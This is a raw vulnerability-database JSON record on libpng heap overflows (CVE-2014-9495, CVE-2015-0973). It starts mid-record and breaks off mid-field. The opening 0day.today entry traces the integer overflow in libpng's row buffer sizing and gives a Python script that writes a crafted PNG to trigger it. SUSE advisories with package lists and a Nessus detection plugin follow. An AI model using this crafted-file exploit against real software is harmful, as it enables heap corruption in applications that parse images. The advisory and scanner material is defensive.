libpng-1.2.6 JB */\r\n#define PNG_ROWBYTES(pixel_bits, width) \\\r\n((pixel_bits) >= 8 ? \\\r\n((png_size_t)(width) * (((png_size_t)(pixel_bits)) >> 3)) : \\\r\n(( ((png_size_t)(width) * ((png_size_t)(pixel_bits))) + 7) >> 3) )\r\n\r\n// row_info.rowbytes = 0x4000000 * ((64) >> 3) = 0x20000000\r\n// row_info.rowbytes = 0x20000000\r\n\r\n/****************************\r\n* deriving png_ptr->row_buf *\r\n****************************/\r\n# pngstruct.h :: line 225\r\n// inside struct png_struct_def, which is png_ptr\r\npng_bytep row_buf; /* buffer to save current (unfiltered) row.\r\n* This is a pointer into big_row_buf\r\n*/\r\n\r\n# pngrutil.c :: png_read_start_row :: line 4403\r\npng_ptr->big_row_buf = (png_bytep)png_malloc(png_ptr, row_bytes + 48);\r\n\r\n// there are a couple #ifdef cases for png_ptr->row_buf to be set from,\r\n// but this summarizes nicely\r\n# pngrutil.c :: png_read_start_row :: line 4427\r\npng_ptr->row_buf = png_ptr->big_row_buf + 31;\r\n\r\n/****************************\r\n* deriving png_ptr->row_buf *\r\n* \\-> deriving row_bytes *\r\n****************************/\r\n# pngrutil :: png_read_start_row :: line 4427\r\nrow_bytes = ((png_ptr->width + 7) & ~((png_uint_32)7));\r\n/* Calculate the maximum bytes needed, adding a byte and a pixel\r\n* for safety's sake\r\n*/\r\nrow_bytes = PNG_ROWBYTES(max_pixel_depth, row_bytes) +\r\n1 + ((max_pixel_depth + 7) >> 3);\r\n\r\n// cliff notes, based on our IHDR color_type being\r\n// PNG_COLOR_TYPE_RGB_ALPHA, max_pixel_depth = 64\r\n\r\nrow_bytes = 0x20000000 * (64 >> 3) = 0;\r\n\r\n// this makes the size of the malloc call to png_malloc 48, which means\r\n// malloc doesn't fail, returns valid pointer into the heap\r\n// png_ptr->big_row_buf = png_malloc(png_ptr, 48)\r\n\r\n\r\n##################\r\n# HAPPY FUN CODE #\r\n##################\r\n\r\nimport zlib\r\nimport struct\r\nimport sys\r\n\r\nOVERFLOW_DATA = 'A' * 4096\r\n\r\nIDAT_DATA = zlib.compress(OVERFLOW_DATA)\r\nIDAT_SIZE = struct.pack('>i', len(IDAT_DATA))\r\nIDAT_CRC32 = struct.pack('>i', zlib.crc32('IDAT' + IDAT_DATA))\r\n\r\nHEADER = '\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a'\r\nIHDR = '\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x10\\x06\\x00\\x00\\x01\\xa8\\xce\\xde\\x04'\r\nIDAT = IDAT_SIZE + 'IDAT' + IDAT_DATA + IDAT_CRC32\r\n\r\nIEND = '\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44'\r\n\r\nsys.stdout.write(HEADER + IHDR + IDAT + IEND)\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23175"}], "suse": [{"lastseen": "2016-09-04T11:37:40", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=912076", "https://bugzilla.suse.com/show_bug.cgi?id=912929"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-tools", "packageFilename": "libpng16-tools-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-16-debuginfo-32bit", "packageFilename": "libpng16-16-debuginfo-32bit-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-16-debuginfo", "packageFilename": "libpng16-16-debuginfo-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-compat-devel", "packageFilename": "libpng16-compat-devel-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-16", "packageFilename": "libpng16-16-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-16-debuginfo-32bit", "packageFilename": "libpng16-16-debuginfo-32bit-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-compat-devel-32bit", "packageFilename": "libpng16-compat-devel-32bit-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-tools", "packageFilename": "libpng16-tools-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-tools-debuginfo", "packageFilename": "libpng16-tools-debuginfo-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-tools-debuginfo", "packageFilename": "libpng16-tools-debuginfo-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-16-debuginfo", "packageFilename": "libpng16-16-debuginfo-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-tools-debuginfo", "packageFilename": "libpng16-tools-debuginfo-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-16-32bit", "packageFilename": "libpng16-16-32bit-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-devel", "packageFilename": "libpng16-devel-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-devel-32bit", "packageFilename": "libpng16-devel-32bit-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-debugsource", "packageFilename": "libpng16-debugsource-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-devel", "packageFilename": "libpng16-devel-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-tools-debuginfo", "packageFilename": "libpng16-tools-debuginfo-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-tools", "packageFilename": "libpng16-tools-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-compat-devel", "packageFilename": "libpng16-compat-devel-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-16-debuginfo", "packageFilename": "libpng16-16-debuginfo-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-devel-32bit", "packageFilename": "libpng16-devel-32bit-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-debugsource", "packageFilename": "libpng16-debugsource-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-compat-devel-32bit", "packageFilename": "libpng16-compat-devel-32bit-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-tools", "packageFilename": "libpng16-tools-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-compat-devel", "packageFilename": "libpng16-compat-devel-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-devel", "packageFilename": "libpng16-devel-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-16", "packageFilename": "libpng16-16-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-16", "packageFilename": "libpng16-16-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-debugsource", "packageFilename": "libpng16-debugsource-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-16-debuginfo", "packageFilename": "libpng16-16-debuginfo-1.6.6-16.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-16-32bit", "packageFilename": "libpng16-16-32bit-1.6.13-2.4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-devel", "packageFilename": "libpng16-devel-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-debugsource", "packageFilename": "libpng16-debugsource-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.6.6-16.1", "packageName": "libpng16-compat-devel", "packageFilename": "libpng16-compat-devel-1.6.6-16.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.6.13-2.4.1", "packageName": "libpng16-16", "packageFilename": "libpng16-16-1.6.13-2.4.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "libpng was updated to fix some security issues:\n\n * CVE-2014-9495 [bnc#912076]: Heap-buffer overflow png_combine_row() with\n very wide interlaced images\n\n * CVE-2015-0973 [bnc#912929]: overflow in png_read_IDAT_data\n\n libpng is now also build with -DPNG_SAFE_LIMITS_SUPPORTED.\n\n", "edition": 1, "reporter": "Suse", "published": "2015-01-28T18:05:31", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for libpng16 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2015-01-28T18:05:31", "id": "OPENSUSE-SU-2015:0161-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00029.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:02:22", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=912076", "https://bugzilla.suse.com/show_bug.cgi?id=912929"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-32bit-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-16-32bit", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-32bit-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16-debuginfo-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-32bit-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16-debuginfo-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-16", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.ppc64le.rpm", "packageName": "libpng16-debugsource", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-devel-1.6.8-5.1.ppc64le.rpm", "packageName": "libpng16-devel", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-32bit-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-debugsource", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.ppc64le.rpm", "packageName": "libpng16-debugsource", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-1.6.8-5.1.ppc64le.rpm", "packageName": "libpng16-16", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-32bit-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-devel-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-debugsource-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-debugsource", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-compat-devel-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-compat-devel", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-devel-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-devel", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-32bit-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-16-debuginfo-32bit", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-compat-devel-1.6.8-5.1.ppc64le.rpm", "packageName": "libpng16-compat-devel", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-1.6.8-5.1.s390x.rpm", "packageName": "libpng16-16-debuginfo", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-compat-devel-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-compat-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-1.6.8-5.1.x86_64.rpm", "packageName": "libpng16-16", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.6.8-5.1", "packageFilename": "libpng16-16-debuginfo-1.6.8-5.1.ppc64le.rpm", "packageName": "libpng16-16-debuginfo", "arch": "ppc64le", "operator": "lt"}], "edition": 1, "description": "This update fixes the following security issues:\n\n * CVE-2014-9495: libpng versions heap overflow vulnerability, that under\n certain circumstances could be exploit. [bnc#912076]\n\n * CVE-2015-0973: A heap-based overflow was found in the\n png_combine_row() function of the libpng library, when very large\n interlaced images were used.[bnc#912929]\n\n", "reporter": "Suse", "published": "2015-01-20T14:04:48", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for libpng16 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2015-01-20T14:04:48", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00016.html", "id": "SUSE-SU-2015:0092-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2017-10-29T13:38:40", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=912929", "http://lists.opensuse.org/opensuse-updates/2015-01/msg00084.html", "https://bugzilla.opensuse.org/show_bug.cgi?id=912076"], "pluginID": "81063", "edition": 2, "description": "libpng was updated to fix some security issues :\n\n - CVE-2014-9495 [bnc#912076]: Heap-buffer overflow png_combine_row() with very wide interlaced images\n\n - CVE-2015-0973 [bnc#912929]: overflow in png_read_IDAT_data\n\nlibpng is now also build with -DPNG_SAFE_LIMITS_SUPPORTED.", "reporter": "Tenable", "published": "2015-01-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "nessus", "title": "openSUSE Security Update : libpng16 (openSUSE-SU-2015:0161-1)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "cpe": ["p-cpe:/a:novell:opensuse:libpng16-compat-devel-32bit", "p-cpe:/a:novell:opensuse:libpng16-16-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libpng16-compat-devel", "p-cpe:/a:novell:opensuse:libpng16-16-debuginfo", "p-cpe:/a:novell:opensuse:libpng16-tools-debuginfo", "p-cpe:/a:novell:opensuse:libpng16-devel-32bit", "p-cpe:/a:novell:opensuse:libpng16-16", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libpng16-tools", "p-cpe:/a:novell:opensuse:libpng16-debugsource", "p-cpe:/a:novell:opensuse:libpng16-devel", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:libpng16-16-32bit"], "modified": "2015-03-11T00:00:00", "id": "OPENSUSE-2015-79.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81063", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-79.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81063);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/03/11 13:51:33 $\");\n\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n\n script_name(english:\"openSUSE Security Update : libpng16 (openSUSE-SU-2015:0161-1)\");\n script_summary(english:\"Check for the openSUSE-2015-79 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libpng was updated to fix some security issues :\n\n - CVE-2014-9495 [bnc#912076]: Heap-buffer overflow\n png_combine_row() with very wide interlaced images\n\n - CVE-2015-0973 [bnc#912929]: overflow in\n png_read_IDAT_data\n\nlibpng is now also build with -DPNG_SAFE_LIMITS_SUPPORTED.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2015-01/msg00084.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=912076\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=912929\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng16 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-16-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-16-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-compat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-compat-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpng16-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-16-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-16-debuginfo-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-compat-devel-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-debugsource-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-devel-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-tools-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpng16-tools-debuginfo-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpng16-16-32bit-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpng16-16-debuginfo-32bit-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpng16-compat-devel-32bit-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpng16-devel-32bit-1.6.6-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-16-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-16-debuginfo-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-compat-devel-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-debugsource-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-devel-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-tools-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libpng16-tools-debuginfo-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libpng16-16-32bit-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libpng16-16-debuginfo-32bit-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libpng16-compat-devel-32bit-1.6.13-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libpng16-devel-32bit-1.6.13-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng16-16 / libpng16-16-32bit / libpng16-16-debuginfo / etc\");\n}\n", "cvss": {"score": 